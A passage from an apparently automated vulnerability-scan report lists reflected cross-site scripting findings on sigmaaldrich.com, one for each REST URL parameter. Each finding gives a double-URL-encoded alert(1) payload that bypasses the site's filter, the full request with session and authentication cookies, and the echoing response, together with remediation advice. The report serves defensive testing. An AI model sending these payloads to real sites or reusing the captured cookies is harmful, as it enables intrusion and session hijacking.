Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/areas-of-interest/chemistry/stockroom-reagentse7c82%2522%253balert%25281%2529%252f%252f18170b86b7a HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:15 GMT
Content-Length: 28972
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/areas-of-interest/chemistry/stockroom-reagentse7c82";alert(1)//18170b86b7a","E404") ;
   </script>
...[SNIP]...

1.99. http://www.sigmaaldrich.com/content/sigma-aldrich/areas-of-interest/labware/labware-catalog [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/areas-of-interest/labware/labware-catalog

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1225e%2522%253balert%25281%2529%252f%252fb54150aa7a4 was submitted in the REST URL parameter 1. This input was echoed as 1225e";alert(1)//b54150aa7a4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content1225e%2522%253balert%25281%2529%252f%252fb54150aa7a4/sigma-aldrich/areas-of-interest/labware/labware-catalog HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:04 GMT
Content-Length: 28967
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content1225e";alert(1)//b54150aa7a4/sigma-aldrich/areas-of-interest/labware/labware-catalog","E404") ;
   </script>
...[SNIP]...

1.100. http://www.sigmaaldrich.com/content/sigma-aldrich/areas-of-interest/labware/labware-catalog [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/areas-of-interest/labware/labware-catalog

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 46b3b%2522%253balert%25281%2529%252f%252f4dfd3aae0d8 was submitted in the REST URL parameter 2. This input was echoed as 46b3b";alert(1)//4dfd3aae0d8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich46b3b%2522%253balert%25281%2529%252f%252f4dfd3aae0d8/areas-of-interest/labware/labware-catalog HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:07 GMT
Content-Length: 28967
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich46b3b";alert(1)//4dfd3aae0d8/areas-of-interest/labware/labware-catalog","E404") ;
   </script>
...[SNIP]...

1.101. http://www.sigmaaldrich.com/content/sigma-aldrich/areas-of-interest/labware/labware-catalog [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/areas-of-interest/labware/labware-catalog

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 72b7a%2522%253balert%25281%2529%252f%252f26ba52d9125 was submitted in the REST URL parameter 3. This input was echoed as 72b7a";alert(1)//26ba52d9125 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/areas-of-interest72b7a%2522%253balert%25281%2529%252f%252f26ba52d9125/labware/labware-catalog HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:09 GMT
Content-Length: 28967
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/areas-of-interest72b7a";alert(1)//26ba52d9125/labware/labware-catalog","E404") ;
   </script>
...[SNIP]...

1.102. http://www.sigmaaldrich.com/content/sigma-aldrich/areas-of-interest/labware/labware-catalog [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/areas-of-interest/labware/labware-catalog

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 53984%2522%253balert%25281%2529%252f%252fe172f22c51a was submitted in the REST URL parameter 4. This input was echoed as 53984";alert(1)//e172f22c51a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/areas-of-interest/labware53984%2522%253balert%25281%2529%252f%252fe172f22c51a/labware-catalog HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:12 GMT
Content-Length: 28967
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/areas-of-interest/labware53984";alert(1)//e172f22c51a/labware-catalog","E404") ;
   </script>
...[SNIP]...

1.103. http://www.sigmaaldrich.com/content/sigma-aldrich/areas-of-interest/labware/labware-catalog [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/areas-of-interest/labware/labware-catalog

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bc4ef%2522%253balert%25281%2529%252f%252fb1741c0c7a1 was submitted in the REST URL parameter 5. This input was echoed as bc4ef";alert(1)//b1741c0c7a1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/areas-of-interest/labware/labware-catalogbc4ef%2522%253balert%25281%2529%252f%252fb1741c0c7a1 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
